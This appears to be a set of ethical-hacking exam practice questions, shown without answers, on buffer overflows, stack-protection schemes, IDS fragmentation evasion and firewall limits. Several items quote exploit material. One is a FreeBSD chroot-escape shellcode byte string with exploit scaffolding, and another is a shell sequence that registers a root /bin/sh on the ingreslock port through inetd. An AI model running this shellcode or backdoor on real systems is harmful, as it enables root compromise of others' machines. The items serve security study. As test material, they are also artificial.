StackGuard (as used by Immunix), ssp/ProPolice (as used by OpenBSD), and Microsoft’s /GS option use _____ defense against buffer overflow attacks.

#define MAKE_STR_FROM_RET(x) ((x)&0xff), (((x)&0xff00)8),

(((x)&0xff0000)16), (((x)&0xff000000)24)

char infin_loop[]=

/* for testing purposes */

"xEBxFE";

char bsdcode[] =

/* Lam3rZ chroot() code rewritten for FreeBSD by venglin */

"x31xc0x50x50x50xb0x7excdx80x31xdbx31xc0x43"

"x43x53x4bx53x53xb0x5axcdx80xebx77x5ex31xc0"

"x8dx5ex01x88x46x04x66x68xffxffx01x53x53xb0"

"x88xcdx80x31xc0x8dx5ex01x53x53xb0x3dxcdx80"

"x31xc0x31xdbx8dx5ex08x89x43x02x31xc9xfexc9"

"x31xc0x8dx5ex08x53x53xb0x0cxcdx80xfexc9x75"

"xf1x31xc0x88x46x09x8dx5ex08x53x53xb0x3dxcd"

"x80xfex0exb0x30xfexc8x88x46x04x31xc0x88x46"

"x07x89x76x08x89x46x0cx89xf3x8dx4ex08x8dx56"

"x0cx52x51x53x53xb0x3bxcdx80x31xc0x31xdbx53"

"x53xb0x01xcdx80xe8x84xffxffxffxffx01xffxffx30"

"x62x69x6ex30x73x68x31x2ex2ex31x31x76x65x6e"

"x67x6cx69x6e";static int magic[MAX_MAGIC],magic_d[MAX_MAGIC];

static char *magic_str=NULL;

int before_len=0;

char *target=NULL, *username="user", *password=NULL;

struct targets getit;

The following exploit code is extracted from what kind of attack?

A buffer overflow occurs when a program or process tries to store more data in a buffer (temporary data storage area) then it was intended to hold.

What is the most common cause of buffer overflow in software today?

Bob has a good understanding of cryptography, having worked with it for many years. Cryptography is used to secure data from specific threat, but it does not secure the application from coding errors. It can provide data privacy, integrity and enable strong

authentication but it cannot mitigate programming errors.

What is a good example of a programming error that Bob can use to illustrate to the management that encryption will not address all of their security concerns?

The programmers on your team are analyzing the free, open source software being used to run FTP services on a server. They notice that there is an excessive number of fgets() and gets() on the source code. These C++ functions do not check bounds.

What kind of attack is this program susceptible to?

Study the following exploit code taken from a Linux machine and answer the questions below:

echo "ingreslock stream tcp nowait root /bin/sh sh I" > /tmp/x;

/usr/sbin/inetd s /tmp/x;

sleep 10;

/bin/ rm f /tmp/x AAAA…AAA

In the above exploit code, the command "/bin/sh sh I" is given.

What is the purpose, and why is `sh’ shown twice?

This IDS defeating technique works by splitting a datagram (or packet) into multiple fragments and the IDS will not spot the true nature of the fully assembled datagram. The datagram is not reassembled until it reaches its final destination. It would be a processor- intensive tasks for an IDS to reassemble all fragments itself and on a busy system the packet will slip through the IDS onto the network.

What is this technique called?

Bob has set up three web servers on Windows Server 2003 IIS 6.0. Bob has followed all the recommendations for securing the operating system and IIS. These servers are going to run numerous e-commerce websites that are projected to bring in thousands of dollars a day. Bob is still concerned about the security of this server because of the potential for financial loss. Bob has asked his company’s firewall administrator to set the firewall to inspect all incoming traffic on ports 80 and 443 to ensure that no malicious data is getting into the network.

Why will this not be possible?

Angela is trying to access an education website that requires a username and password to login. When Angela clicks on the link to access the login page, she gets an error message stating that the page can’t be reached. She contacts the website’s support team and they report that no one else is having any issues with the site. After handing the issue over to her company’s IT department, it is found that the education website requires any computer accessing the site must be able to respond to a ping from the education’s server. Since Angela’s computer is behind a corporate firewall, her computer can’t ping the education website back.

What ca Angela’s IT department do to get access to the education website?

SSL has been as the solution to a lot of common security problems. Administrator will often time make use of SSL to encrypt communications from points A to Point B. Why do you think this could be a bad idea if there is an Intrusion Detection System deployed to monitor the traffic between Point A to Point B?